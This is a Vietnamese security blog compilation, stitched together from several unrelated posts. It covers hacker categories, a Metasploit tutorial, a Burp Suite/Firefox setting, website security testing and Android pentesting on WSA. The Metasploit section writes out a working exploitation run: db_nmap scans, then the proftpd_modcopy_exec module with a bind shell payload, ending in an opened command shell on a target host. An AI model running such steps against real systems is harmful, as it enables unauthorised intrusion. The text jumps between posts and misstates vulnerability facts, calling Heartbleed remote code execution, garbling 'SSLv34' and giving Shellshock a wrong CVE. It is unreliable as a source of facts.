Cryptojacker rất khó phát hiện, vì mã độc có thể không bị phát hiện trong một thời gian dài. Vì động cơ của họ không phải là đánh cắp dữ liệu của nạn nhân, mà là sử dụng hệ thống của họ như một phương tiện để khai thác tiền điện tử, nên rất khó để truy ra nguồn lây nhiễm khi nó được phát hiện.

Động cơ : Khai thác tiền điện tử

Ai có nguy cơ cao nhất? Bất kỳ cá nhân hoặc tổ chức nào có mạng không an toàn

13. Gaming Hacker

Mục đích Gaming Hacker là nhằm vào các đối thủ cạnh tranh trong thế giới game. Với sự bùng nổ của ngành công nghiệp game, không có gì ngạc nhiên khi danh mục Gaming Hacker chuyên biệt đã xuất hiện. Các game thủ chuyên nghiệp có thể chi hàng nghìn đô la cho phần cứng hiệu suất cao và “nạp tiền” vào game, và Hacker thường thực hiện các cuộc tấn công nhằm đánh cắp “tiền trong Game” của đối thủ cạnh tranh hoặc gây ra các cuộc tấn công từ chối dịch vụ (DDoS) để đối thủ họ bị lag, thua cuộc.

Động cơ: Để thỏa hiệp với các đối thủ chơi game

Ai có nguy cơ cao nhất? Những người chơi game nổi tiếng

14. Botnet

Hacker botnet là những người viết các phần mềm độc hại tạo ra các bot để thực hiện các cuộc tấn công số lượng lớn trên nhiều thiết bị nhất có thể, thường nhắm mục tiêu vào Router, Camera và các thiết bị Internet of Things (IoT) khác. Các bot hoạt động bằng cách tìm kiếm các thiết bị không an toàn (hoặc các thiết bị vẫn sử dụng thông tin đăng nhập mặc định) để tự đưa vào. Các botnet có thể được sử dụng trực tiếp bởi hacker đã tạo ra chúng, và cũng được bán dark web cho các Hacker khác sử dụng.

Động cơ: Để tấn công DDoS

Ai có nguy cơ cao nhất? Bất kỳ hệ thống mạng có kết nối Internet

Để bảo vệ bạn trước các nguy cơ tấn công mạnh, sự rình rập của Hacker, hãy trang bị cho mình kiến thức An ninh mạng khi sử dụng máy tính.

Câu hỏi thường gặp

Hacker mũ đen khác với Hacker mũ trắng như thế nào?

Hacker mũ đen (Blackhat) là những tội phạm mạng thực hiện các hoạt động hack với mục đích xấu, như đánh cắp dữ liệu hoặc gây thiệt hại. Hacker mũ trắng (Whitehat), ngược lại, là những chuyên gia an ninh mạng được ủy quyền để tìm và vá lỗi bảo mật trong hệ thống.

Script Kiddies là ai và họ gây ra mối nguy hiểm gì?

Script Kiddies là những người nghiệp dư, thiếu kỹ năng chuyên môn, sử dụng các công cụ và mã độc có sẵn trên mạng để thực hiện các cuộc tấn công. Họ gây ra rủi ro cho các hệ thống có bảo mật yếu.

Ethical Hacking là gì và tại sao nó lại quan trọng?

Ethical Hacking (Hacking có đạo đức) là việc sử dụng các kỹ thuật hacking để kiểm tra và cải thiện an ninh mạng của một hệ thống. Nó rất quan trọng vì giúp phát hiện và khắc phục các lỗ hổng bảo mật trước khi hacker mũ đen có thể khai thác chúng.

Quét lỗ hổng bảo mật bằng OpenVAS, Nessus hoặc bất kỳ thứ gì khác chạy tốt trên phần cứng nhẹ. Theo kinh nghiệm của mình, một máy quét lỗ hổng chuyên dụng sẽ khá tốn nhiều tài nguyên.

Vì vậy, khi sử dụng Metasploit làm công cụ chính để khai thác phần mềm dễ bị tấn công, mình muốn chia sẻ một số mẹo mà mình đã tìm thấy để thực hiện quét lỗ hổng bảo mật bằng Metasploit.

Nmap + Metasploit

Gần đây mình đã phát hiện ra rằng bạn có thể sử dụng nmap trực tiếp từ Metasploit bằng cách sử dụng mô-đun db_nmap. Sử dụng mô-đun này khá tốt vì bạn có thể nhận được kết quả được nhập trực tiếp vào Metasploit.

Dưới đây là một ví dụ về lệnh db_nmap trong Metasploit:

msf6 > db_nmap -sV 192.168.1.5

Đây là kết quả đầu ra (máy chủ này đang chạy container Docker dễ bị tấn công):

msf6 > db_nmap -sV 192.168.1.5
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-08 03:47 UTC
[*] Nmap: Nmap scan report for 192.168.1.5 (192.168.1.5)
[*] Nmap: Host is up (0.12s latency).
[*] Nmap: rDNS record for 192.168.1.5: 192.168.1.5.vultr.com
[*] Nmap: Not shown: 991 closed ports
[*] Nmap: PORT     STATE    SERVICE     VERSION
[*] Nmap: 21/tcp   open     ftp         ProFTPD 1.3.5
[*] Nmap: 22/tcp   open     ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
[*] Nmap: 25/tcp   filtered smtp
[*] Nmap: 80/tcp   open     http        Apache httpd 2.4.7 ((Ubuntu))
[*] Nmap: 139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 631/tcp  open     ipp         CUPS 1.7
[*] Nmap: 6667/tcp open     irc         UnrealIRCd
[*] Nmap: Service Info: Hosts: VULN, irc.TestIRC.net; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 18.18 seconds

Bây giờ, Metasploit đã biết về các dịch vụ trên máy chủ đó. Kiểm tra bằng lệnh services :

msf6 > services
Services
========
host          port  proto  name         state     info
----          ----  -----  ----         -----     ----
192.168.1.5  21    tcp    ftp          open      ProFTPD 1.3.5
192.168.1.5  22    tcp    ssh          open      OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 Ubuntu Linux; proto
                                                  col 2.0
192.168.1.5  25    tcp    smtp         filtered
192.168.1.5  80    tcp    http         open      Apache httpd 2.4.7 (Ubuntu)
192.168.1.5  139   tcp    netbios-ssn  open      Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.168.1.5  445   tcp    netbios-ssn  open      Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.168.1.5  631   tcp    ipp          open      CUPS 1.7
192.168.1.5  6667  tcp    irc          open      UnrealIRCd

Với db_nmap, nó sẽ tự động nhập các lỗ hổng nếu bạn sử dụng bất kỳ tập lệnh quét lỗ hổng nào của nmap.

Đây là một lệnh ví dụ:

msf6 > db_nmap -sV --script=vulners.nse 192.168.1.5

Sau khi hoàn thành lệnh đó, mình có thể sử dụng lệnh vulns để kiểm tra các khai thác được lưu trữ trong Metasploit đã được phát hiện bằng cách sử dụng nmap:

msf6 > vulns
Vulnerabilities
===============
Timestamp                Host          Name                             References
---------                ----          ----                             ----------
2021-08-08 03:55:55 UTC  192.168.1.5  cpe:/a:proftpd:proftpd:1.3.5     CVE-2015-3306,SAINT:950EB68D408A40399926A4CCAD3CC62E,SAINT:63FB77B9136D48259E4F0D4CDA35E957,SAINT:1B08F4664C428B180EEC9617B41D9A2C,PROFTPD_MOD_COPY,PACKETSTORM:162777,PACKETSTORM:132218,PACKETSTORM:131567,PACKETSTORM:131555,PACKETSTORM:131505,MSF:EXPLOIT/UNIX/FTP/PROFTPD_MODCOPY_EXEC,EDB-ID:49908,EDB-ID:37262,EDB-ID:36803,EDB-ID:36742,1337DAY-ID-23720,1337DAY-ID-23544,SSV:61050,MSF:ILITIES/SUSE-CVE-2019-18217/,CVE-2019-19272,CVE-2019-19271,CVE-2019-19270,CVE-2019-18217,CVE-2016-3125,CVE-2013-4359,CVE-2017-7418
<snipped>

Bạn có thể thấy có một lỗ hổng mà Metasploit đã khai thác trong đầu ra ở trên của các tệp tin:

MSF:EXPLOIT/UNIX/FTP/PROFTPD_MODCOPY_EXEC

Vì vậy, hãy khai thác nó:

msf6 > use exploit/unix/ftp/proftpd_modcopy_exec
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set RHOSTS 192.168.1.5
RHOSTS => 192.168.1.5
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set SITEPATH /var/www/html
SITEPATH => /var/www/html
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/bind_awk 
payload => cmd/unix/bind_awk
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run 
[*] 192.168.1.5:80 - 192.168.1.5:21 - Connected to FTP server
[*] 192.168.1.5:80 - 192.168.1.5:21 - Sending copy commands to FTP server
[*] 192.168.1.5:80 - Executing PHP payload /VlrUb.php
[*] Started bind TCP handler against 192.168.1.5:4444
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.5:4444) at 2021-08-08 04:21:30 +0000

Shell được tạo bằng cách sử dụng kết quả quét lỗ hổng bảo mật được thực hiện trên điện thoại Android.

Mình khuyên bạn nên sử dụng thêm các tập lệnh quét lỗ hổng nmap với mô-đun db_nmap của Metasploit.

Quét lỗ hổng ứng dụng web

Metasploit có một mô-đun quét lỗ hổng ứng dụng web được tích hợp sẵn: WMAP:

WMAP Web Scanner

Tài liệu về WMAP trong repo Github cũ của người khác giải thích điều khiến WMAP trở nên đặc biệt:

https://github.com/lattera/metasploit/blob/master/documentation/wmap.txt

Có vẻ như nó không được cập nhật trong 10 năm. Theo giải thích trong liên kết ở trên, WMAP sẽ sử dụng thông tin được lưu trữ trong cơ sở dữ liệu để tấn công mục tiêu của bạn một cách thông minh. Ngoài ra, bạn có thể tạo hồ sơ WMAP để sử dụng các mô-đun mới hơn hoặc thậm chí tùy chỉnh trong Metasploit – điều này làm cho WMAP có thể mở rộng và vẫn phù hợp ở hiện tại.

Đầu tiên, tải wmap và định cấu hình mục tiêu của bạn:

msf6 > load wmap
.-.-.-..-.-.-..---..---.
| | | || | | || | || |-'
`-----'`-'-'-'`-^-'`-'
[WMAP 1.5.1] ===  et [  ] metasploit.com 2012
[*] Successfully loaded plugin: wmap
msf6 > wmap_sites -a http://192.168.1.5
[*] Site created.
msf6 > wmap_targets -t http://192.168.1.5/drupal
msf6 > wmap_targets -l
[*] Defined targets
===============
     Id  Vhost         Host          Port  SSL    Path
     --  -----         ----          ----  ---    ----
     0   192.168.1.5  192.168.1.5  80    false  /drupal

Tiếp theo, chạy thử nghiệm đối với mục tiêu của bạn:

msf6 > wmap_run -t
[*] Testing target:
[*] 	Site: 192.168.1.5 (192.168.1.5)
[*] 	Port: 80 SSL: false
============================================================
[*] Testing started. 2021-08-08 04:43:27 +0000
[*] Loading wmap modules...
<snipped>

Cuối cùng, chạy lệnh quét:

msf6 > wmap_run -e 
[*] Using ALL wmap enabled modules.
[-] NO WMAP NODES DEFINED. Executing local modules
[*] Testing target:
[*] 	Site: 192.168.1.5 (192.168.1.5)
[*] 	Port: 80 SSL: false
============================================================
[*] Testing started. 2021-08-08 04:50:06 +0000
[*] 
=[ SSL testing ]=
============================================================
[*] Target is not SSL. SSL modules disabled.
[*] 
=[ Web Server testing ]=
============================================================
[*] Module auxiliary/scanner/http/http_version
[+] 192.168.1.5:80 Apache/2.4.7 (Ubuntu)
[*] Module auxiliary/scanner/http/open_proxy
[*] Module auxiliary/admin/http/tomcat_administration
<snipped>

Sử dụng cấu hình WMAP tùy chỉnh

Trong repo Metasploit Github có một số tài liệu hướng dẫn cách bạn có thể mở rộng WMAP để sử dụng các mô-đun khác bằng cách sử dụng cấu hình WMAP:

wmap_sample_profile.txt

Đây là file:

# 
# WMAP 1.0 Sample Profile
# wmap_run -e /path/to/profile
#
# Just add the name of the module. Use # for comments
#
frontpage
frontpage_login
options 
version 
backup_file 
#blind_sql_query 
#brute_dirs 
copy_of_file 
dir_listing 
dir_scanner
file_same_name_dir
writable

Bạn có thể thấy từ các nhận xét trong tệp rằng bạn có thể mở rộng WMAP để sử dụng các mô-đun khác. Điều này làm cho WMAP thực sự hữu ích vì bạn có thể kiểm tra các mô-đun Metasploit mới hơn hoặc tùy chỉnh trên Web Server.

Vì vậy, như một ví dụ đơn giản, bạn có thể sử dụng cấu hình ví dụ đó, đặt nó vào /tmp/wmap-profile và sau đó chạy cấu hình WMAP bằng lệnh sau trong Metasploit:

msf6 > wmap_run -e /tmp/wmap-profile

Như mình đã nói trước đó, việc này làm cho WMAP có thể mở rộng và có thể sẽ giữ nó mãi mãi hữu ích khi Rapid 7 tiếp tục tạo và cập nhật các mô-đun của Metasploit.

Câu hỏi thường gặp

Tôi có thể sử dụng Metasploit để quét lỗ hổng trên thiết bị di động không?

Có, bạn có thể sử dụng Metasploit trên các thiết bị di động như điện thoại Android, tuy nhiên, hiệu suất có thể bị hạn chế bởi tài nguyên phần cứng. Sử dụng các công cụ nhẹ và tối ưu hóa quá trình quét là rất quan trọng.

Làm thế nào để tôi sử dụng Nmap với Metasploit để quét lỗ hổng?

Bạn có thể sử dụng mô-đun db_nmap trong Metasploit. Lệnh msf6 > db_nmap -sV <địa_chỉ_IP> sẽ quét cổng và dịch vụ, nhập kết quả vào Metasploit để phân tích và khai thác.

Metasploit có công cụ tích hợp để quét lỗ hổng ứng dụng web không?

Có, Metasploit tích hợp WMAP (Web Application Mapper), một mô-đun quét lỗ hổng ứng dụng web. Tuy nhiên, WMAP cần được tải thêm (msf6 > load wmap) và có thể cần cấu hình thêm để sử dụng hiệu quả.

Cách chặn “detectportal.firefox.com” khi dùng Burp Suite

Burp Suite là công cụ để rà quét lỗ hổng Website được ưa chuộng nhất hiện nay. Khi dùng Burp Suite làm Proxy để bắt Request bạn thường sẽ dùng trình duyệt Firefox để thực hiện Pentest. Nhưng mỗi lần bắt Request bạn sẽ gặp phải dạng link https://detectportal.firefox.com/success.txt?ipv6 , https://detectportal.firefox.com/success.txt?ipv4 , https://detectportal.firefox.com/canonical.html. Việc này sẽ gây rốt và tốn thời gian tìm được link cần thực hiện Pentest. Để tắt tính năng Firefox Spam link detectportal.firefox.com do Burp Suite bắt được, bạn thực hiện như sau:

Bước 1: Mở Firefox lên, trên thanh Address gõ đường dẫn:  about:config để truy cập trang cấu hình của Firefox. Nhấn vào nút Accept the risk and continue để tiếp tục

Bước 2: Tìm kiếm từ khóa.

Nhập “Captive” vào hộp tìm kiếm và đợi nó tải danh sách khớp với từ khóa.

Bước 3: Tìm đến tên “network.captive-portal-service.enabled”, nếu đang ở giá trị True thì Double Click vào và chọn thành False (hoặc nhấn nút bật tắt ở bên phải để thay đổi giá trị thành “false”)

Bây giờ bạn tắt Firefox mở khởi động lại, hãy thử mở Burp Suite và bắt Request của Website, trong Tab History bạn sẽ không còn thấy xuất hiện của các link https://detectportal.firefox.com/ nửa, như vậy sẽ giúp bạn tiết kiệm thời gian để vọc Website hơn. Nếu chưa biết sử dụng Burp Suite hãy xem bài Web Pentest – Bài 1: Giới thiệu tổng quan về Burp Suite để nắm căn bản về phần mềm này.

Câu hỏi thường gặp

Tại sao tôi thấy liên tục xuất hiện “detectportal.firefox.com” khi sử dụng Burp Suite với Firefox?

Firefox tự động kiểm tra xem thiết bị của bạn có kết nối với mạng captive portal (ví dụ: mạng Wi-Fi công cộng yêu cầu đăng nhập) hay không. Quá trình này tạo ra các yêu cầu đến `detectportal.firefox.com`, gây nhiễu khi sử dụng Burp Suite.

Làm thế nào để ngăn chặn Firefox gửi yêu cầu đến “detectportal.firefox.com”?

Bạn cần thay đổi một thiết lập trong cấu hình của Firefox. Truy cập `about:config`, tìm kiếm “network.captive-portal-service.enabled” và đổi giá trị từ “true” sang “false”.

Tôi cần khởi động lại Firefox hay Burp Suite sau khi thay đổi thiết lập?

Chỉ cần khởi động lại trình duyệt Firefox là đủ. Sau khi khởi động lại, các yêu cầu đến `detectportal.firefox.com` sẽ không còn xuất hiện nữa.

Kiểm tra bảo mật Website là gì và các tính năng của nó là gì?

Mục tiêu của kiểm tra bảo mật Website là để đánh giá tính bảo mật của một Website hoặc ứng dụng web. Đánh giá bảo mật Website có thể được sử dụng để xác định các lỗ hổng trong hệ thống và xác định liệu kẻ tấn công có thể khai thác các lỗ hổng đó để truy cập vào dữ liệu nhạy cảm hoặc thực hiện các hành động độc hại khác hay không. Kiểm tra thâm nhập, kiểm tra mã và quét lỗ hổng bảo mật là ba trong số các quy trình kiểm tra bảo mật Website phổ biến nhất.

• Kiểm tra thâm nhập (còn được gọi là “Pentest”) là một trong những đánh giá bảo mật ứng dụng web được thực hiện thường xuyên nhất. Chúng liên quan đến việc sử dụng các công cụ tự động hoặc các kỹ thuật thủ công để cố gắng khai thác các điểm yếu trong hệ thống. Nếu thành công, điều này có thể cung cấp cho kẻ tấn công toàn quyền kiểm soát hệ thống và cho phép chúng truy cập vào dữ liệu nhạy cảm hoặc thực hiện các hành động độc hại khác.
• Code reviews – đây là loại kiểm tra theo dạng White box, bạn đang cung cấp đầy đủ mã nguồn của Website để kiểm tra xem Code có lỗ hổng nào không. Đây là một loại kiểm tra thâm nhập yêu cầu kiểm tra thủ công mã nguồn của hệ thống để tìm các sai sót. Nó có thể tốn thời gian, nhưng nó thường đáng giá cao vì việc xem xét mã có thể phát hiện ra những sai sót mà các loại kiểm tra khác sẽ bỏ sót.
• Quét lỗ hổng bảo mật là một loại kiểm tra bảo mật Website phổ biến khác. Chúng liên quan đến việc sử dụng các công cụ tự động để quét hệ thống tìm các lỗ hổng đã biết. Đây thường là một cách nhanh chóng và dễ dàng để tìm ra các điểm yếu tiềm ẩn trong hệ thống, nhưng điều quan trọng cần lưu ý là không phải tất cả các lỗ hổng đều được máy quét lỗ hổng tìm thấy.

Tại sao Kiểm tra Bảo mật Website lại quan trọng?

Điều quan trọng là phải tiến hành kiểm tra bảo mật Website vì nó giúp bạn phát hiện ra các lỗ hổng trong hệ thống của mình trước khi kẻ tấn công thực hiện. Bằng cách phát hiện và sửa chữa những lỗ hổng này, bạn có thể làm cho Website an toàn hơn trước Hacker. Ngoài ra, kiểm tra bảo mật Website cũng có thể giúp bạn đáp ứng các yêu cầu tuân thủ, chẳng hạn như các yêu cầu do Ngành thẻ thanh toán (PCI) đặt ra cho các Website xử lý thanh toán bằng thẻ tín dụng.

Điều gì xảy ra nếu Kiểm tra Bảo mật Website không được thực hiện thường xuyên

Nếu kiểm tra bảo mật Website không được thực hiện, thì rất có thể các lỗ hổng sẽ không được chú ý và chưa được vá. Điều này có nghĩa là những kẻ tấn công sẽ có thời gian dễ dàng hơn khi khai thác những điểm yếu này và giành quyền truy cập vào dữ liệu nhạy cảm hoặc thực hiện các hành động độc hại khác. Ngoài ra, nếu kiểm tra bảo mật Website không được thực hiện thường xuyên, thì các lỗ hổng bảo mật mới có thể xuất hiện theo thời gian khi các tính năng mới được thêm vào hệ thống hoặc phần mềm mới được cài đặt.

Cách kiểm tra bảo mật Website – Các bước:

Bây giờ chúng ta đã xem xét kiểm tra bảo mật Website là gì và tại sao nó lại quan trọng, hãy cùng xem cách kiểm tra bảo mật Website. Nói chung, có bốn bước mà bạn sẽ cần làm theo:

Bây giờ chúng ta đã xem xét kiểm tra bảo mật Website là gì và tại sao nó lại quan trọng, hãy cùng xem cách kiểm tra bảo mật Website. Nói chung, có bốn bước mà bạn sẽ cần làm theo:

Lập kế hoạch kiểm tra

Bước đầu tiên trong kiểm tra bảo mật Website là lập kế hoạch kiểm tra của bạn. Điều này liên quan đến việc quyết định loại thử nghiệm bạn muốn chạy, phạm vi bạn muốn thử nghiệm và những tài nguyên nào bạn sẽ cần.

Có một số loại kiểm tra bảo mật Website khác nhau, mặc dù những loại kiểm tra thường xuyên nhất bao gồm kiểm tra thâm nhập, đánh giá mã (review code) và quét lỗ hổng bảo mật. Bạn cũng sẽ cần chọn một phạm vi cho thử nghiệm của mình. Điều này có nghĩa là quyết định hệ thống và ứng dụng nào bạn muốn kiểm tra và những hệ thống và ứng dụng nào bạn muốn loại trừ.

Cuối cùng, bạn sẽ cần thu thập các tài nguyên cần thiết cho bài kiểm tra của mình. Điều này bao gồm những thứ như công cụ kiểm tra, tài liệu và bất kỳ tài liệu cần thiết nào khác.

Chuẩn bị

Giai đoạn tiếp theo là chuẩn bị cho việc kiểm tra của bạn như thiết lập môi trường thử nghiệm và đảm bảo tất cả các công cụ và tài liệu cần thiết đều có sẵn.

Để bắt đầu, bạn cần xây dựng thiết lập thử nghiệm của mình như một môi trường thử nghiệm riêng biệt bị ngắt kết nối với môi trường thật. Điều này rất quan trọng vì nó đảm bảo rằng bất kỳ thay đổi hoặc sửa đổi nào được thực hiện trong quá trình thử nghiệm không ảnh hưởng đến các hệ thống đang hoạt động.

Do đó, bạn sẽ cần thu thập các thiết bị và thủ tục giấy tờ cần thiết. Điều này bao gồm những thứ như công cụ thử nghiệm, trường hợp thử nghiệm và bất kỳ tài liệu liên quan nào khác.

Cuối cùng, bạn sẽ cần phải lập một kế hoạch kiểm tra cùng nhau. Tài liệu này phải phác thảo các mục tiêu của thử nghiệm, phạm vi thử nghiệm và các nguồn lực mà bạn sẽ cần.

Kiểm tra hệ thống

Khi mọi thứ đã chuẩn bị xong, bạn có thể bắt đầu thực hiện các bài kiểm tra của mình. Điều này liên quan đến việc chạy bài test hệ thống đã chọn và ghi lại kết quả.

Có nhiều loại kiểm tra bảo mật Website khác nhau, nhưng kiểm tra thâm nhập, đánh giá mã và quét lỗ hổng bảo mật là những loại phổ biến nhất.

Các bài kiểm tra thâm nhập được sử dụng để mô phỏng các cuộc tấn công trong thế giới thực và xác định các lỗ hổng có thể bị khai thác bởi những kẻ tấn công.

Đánh giá mã được sử dụng để kiểm tra mã nguồn của các ứng dụng và xác định các điểm yếu tiềm ẩn về bảo mật.

Quét lỗ hổng bảo mật được sử dụng để quét các hệ thống và ứng dụng để tìm các lỗ hổng đã biết.

Báo cáo

Cuối cùng, bạn sẽ cần báo cáo về những phát hiện của mình. Điều này liên quan đến việc viết một báo cáo về những phát hiện của bạn và trình bày nó cho các bên liên quan có liên quan.

Báo cáo của bạn nên bao gồm bản tóm tắt các phát hiện của bạn, cũng như chi tiết về bất kỳ lỗ hổng bảo mật nào đã được xác định. Điều quan trọng cần lưu ý là không phải tất cả các lỗ hổng đều nghiêm trọng và bạn nên ưu tiên chúng dựa trên mức độ nghiêm trọng của chúng.

Bạn cũng nên bao gồm các khuyến nghị để khắc phục, là các hành động có thể được thực hiện để giải quyết các lỗ hổng bảo mật đã được xác định.

Một số lỗ hổng chính được tìm thấy thông qua kiểm tra bảo mật Website là gì?

Đã có nhiều lỗ hổng chính được tìm thấy thông qua kiểm tra bảo mật Website trong những năm qua. Một số trong những cái đáng chú ý nhất bao gồm:

– Heartbleed (CVE-2014-0160): Đây là một lỗ hổng nghiêm trọng trong thư viện phần mềm OpenSSL đã ảnh hưởng đến nhiều Website và ứng dụng web. Nó cho phép những kẻ tấn công thực thi mã từ xa trên các hệ thống đang chạy các phiên bản OpenSSL dễ bị tấn công.

– Poodle (CVE-2014-3566): Đây là một lỗ hổng nghiêm trọng trong SSLv34 đã ảnh hưởng đến nhiều Website và ứng dụng web. Nó cho phép những kẻ tấn công giải mã từ xa lưu lượng được cho là được mã hóa bởi SSLv34.

– Shellshock (CVE-2014-2716): Đây là một lỗ hổng nghiêm trọng trong Bash shell ảnh hưởng đến nhiều Website và ứng dụng web.

– GHOST (CVE-2015-0235): Đây là một lỗ hổng nghiêm trọng trong thư viện glibc đã ảnh hưởng đến nhiều Website và ứng dụng web.

Công ty nào cung cấp thử nghiệm bảo mật Website?

Có rất nhiều công ty cung cấp dịch vụ kiểm tra bảo mật Website. Một số công ty nổi tiếng như:

• WhiteHat Security: WhiteHat Security là nhà cung cấp dịch vụ kiểm tra bảo mật Website hàng đầu.
• Astra’s Pentest: Astra’s Pentest là một nhà cung cấp dịch vụ kiểm tra bảo mật Website phổ biến khác. Họ cung cấp cả thử nghiệm tự động và thủ công, cũng như thử nghiệm thâm nhập mạng và thiết bị di động với mức giá khá hợp lý.
• RapidScan: RapidScan là nhà cung cấp hàng đầu các dịch vụ kiểm tra bảo mật Website tự động. Các chuyên gia bảo mật thực hiện kiểm tra kỹ lưỡng lỗ hổng bảo mật, tích hợp tường lửa ứng dụng web an toàn, v.v.
• Nessus: Nessus là nhà cung cấp dịch vụ quét lỗ hổng bảo mật phổ biến. Kiểm tra thâm nhập dựa trên web và đánh giá bảo mật có sẵn.
• Veracode: Một nhà cung cấp dịch vụ kiểm tra bảo mật Website nổi bật khác là Veracode. Họ cung cấp cả xác minh tĩnh và động.
• Qualys: Qualys là nhà cung cấp hàng đầu về các giải pháp quản lý lỗ hổng bảo mật và tuân thủ. Họ cung cấp nhiều loại sản phẩm, bao gồm quét ứng dụng web, có thể được sử dụng để kiểm tra các lỗ hổng trong các Website và ứng dụng web.

Các tính năng hàng đầu của các công ty kiểm tra bảo mật Website là gì?

Khi chọn một công ty kiểm tra bảo mật Website, bạn cần lưu ý các vấn đề sau:

• Kiểm tra tự động hoặc thủ công: Một số công ty chỉ cung cấp kiểm tra tự động, trong khi những công ty khác cũng cung cấp kiểm tra thủ công.
• Thử nghiệm tĩnh hoặc động: Một số công ty chỉ cung cấp thử nghiệm tĩnh, trong khi những công ty khác cũng cung cấp thử nghiệm động.
• Dịch vụ bảo mật đa dạng: Một số công ty chỉ cung cấp thử nghiệm bảo mật Website, trong khi những công ty khác cũng cung cấp một loạt các dịch vụ bảo mật khác. Nếu bạn muốn được bảo vệ toàn diện nhất có thể, thì bạn nên chọn một công ty cung cấp nhiều dịch vụ bảo vệ.

Bạn có thể chắc chắn thuê doanh nghiệp kiểm tra bảo mật Website tốt nhất cho nhu cầu của mình nếu bạn ghi nhớ những đặc điểm này.

Lời kết

Kiểm tra bảo mật Website của bạn là điều quan trọng để đảm bảo an toàn cho dữ liệu của bạn và dữ liệu của người dùng. Có rất nhiều công ty cung cấp dịch vụ kiểm tra bảo mật Website, vì vậy hãy đảm bảo chọn một công ty cung cấp các tính năng bạn cần.

Nếu bạn không tiến hành kiểm tra bảo mật một cách thường xuyên, bạn đang tự đặt mình vào rủi ro. Các lỗ hổng mới liên tục được phát hiện và nếu bạn không kiểm tra chúng, thì bạn có thể là nạn nhân tiếp theo. Có rất nhiều công ty cung cấp dịch vụ kiểm tra bảo mật Website, vì vậy hãy đảm bảo chọn một công ty phù hợp với nhu cầu của bạn.

Câu hỏi thường gặp

Kiểm tra bảo mật website có thực sự cần thiết không?

Hoàn toàn cần thiết! Kiểm tra bảo mật giúp phát hiện và vá các lỗ hổng trước khi hacker tấn công, bảo vệ dữ liệu và danh tiếng website của bạn. Việc này cũng giúp đáp ứng các yêu cầu tuân thủ về bảo mật.

Tôi nên kiểm tra bảo mật website thường xuyên như thế nào?

Tần suất kiểm tra phụ thuộc vào độ phức tạp của website và mức độ nhạy cảm của dữ liệu. Tuy nhiên, ít nhất nên thực hiện định kỳ hàng năm, hoặc thường xuyên hơn nếu có cập nhật lớn về phần mềm hoặc tính năng.

Những loại kiểm tra bảo mật website phổ biến là gì?

Ba loại phổ biến gồm: Kiểm tra thâm nhập (Pentest), đánh giá mã nguồn (Code review) và quét lỗ hổng bảo mật. Mỗi loại đều có ưu điểm riêng và thường được kết hợp để đảm bảo hiệu quả tối đa.

Ngay cả khi bạn không có quyền truy cập vào nhiều thiết bị, thì thiết bị ảo (AVD) tích hợp sẵn của Android Studio thường là lựa chọn phù hợp cho các công việc pentest như vậy. Có thể root AVD và nó tích hợp hoàn hảo với debuger, vì vậy mọi thứ đều hoạt động tốt. Nhưng nếu bạn đang chạy Windows 11 và bạn muốn pentest ứng dụng Android, thì bạn có thể dễ dàng làm vậy mà không cần dựa vào trình giả lập hoặc máy ảo, nhờ sự hỗ trợ của Windows Subsystem for Android (WSA).

Cách pentest ứng dụng Android trên Windows 11 bằng WSA

Theo Michael Higgo từ Orange Cyberdefense, người ta có thể sử dụng WSA để kiểm tra bảo mật Android theo cách tương tự như trên thiết bị Android vật lý. Higgo, Nhà phân tích bảo mật hàng đầu tại SensePost, gần đây đã đăng một bài viết trên blog với một số chi tiết chung về cách tiến hành kiểm tra bảo mật ứng dụng Android trên WSA.

Khi đánh giá tình trạng bảo mật của ứng dụng Android, việc sử dụng bộ công cụ khai thác thời gian chạy trên thiết bị di động như Objection kết hợp với Windows Subsystem for Android khiến công việc trở nên khá hợp lý đối với một nhà nghiên cứu bảo mật.

Subsystem Android for Windows 11 được phát triển bởi cùng một công nghệ của Windows Subsystem for Linux. Nhờ khả năng ảo hóa liền mạch được hỗ trợ bởi Hyper-V, WSA nhanh hơn đáng kể so với bất kỳ trình giả lập Android nào khác hiện có. Hơn nữa, bạn có thể tải ứng dụng trên WSA hoặc thậm chí sửa đổi system image cơ bản để cài đặt CH Play và các ứng dụng khác của Google. Tóm lại, sẽ rất hợp lý khi sử dụng Windows Subsystem for Android như một nền tảng kiểm thử ứng dụng di động.

Sau khi cài đặt trình khởi chạy trong WSA, bạn có thể truy cập phần cài đặt mạng của lớp Android. Tiếp theo, bạn có thể cài đặt tổ chức phát hành chứng chỉ và thiết lập proxy tùy chỉnh để chặn lưu lượng truy cập bằng cách sử dụng các công cụ quét lỗ hổng web như Burp suite.

Để biết thêm về kiểm thử bảo mật Android bằng WSA, hãy xem bài đăng trên blog của Michael Higgo tại đây. Cho dù bạn là một nhà nghiên cứu bảo mật chuyên nghiệp hay bạn chỉ đơn giản là muốn tìm hiểu về Windows Subsystem for Android, thì đây vẫn là cách tuyệt vời để tìm hiểu thử nghiệm thâm nhập trên các ứng dụng Android.

Câu hỏi thường gặp

WSA có nhanh hơn các trình giả lập Android khác không?

Có, WSA nhanh hơn đáng kể so với các trình giả lập Android khác nhờ khả năng ảo hóa liền mạch được hỗ trợ bởi Hyper-V.

Tôi có thể cài đặt Google Play Store trên WSA được không?

Có, bạn có thể sửa đổi system image cơ bản của WSA để cài đặt Google Play Store và các ứng dụng khác của Google.

Tôi có thể sử dụng WSA để kiểm tra bảo mật ứng dụng Android như thế nào?

Bạn có thể sử dụng WSA kết hợp với các bộ công cụ khai thác thời gian chạy như Objection và các công cụ quét lỗ hổng web như Burp Suite để kiểm tra bảo mật ứng dụng Android.

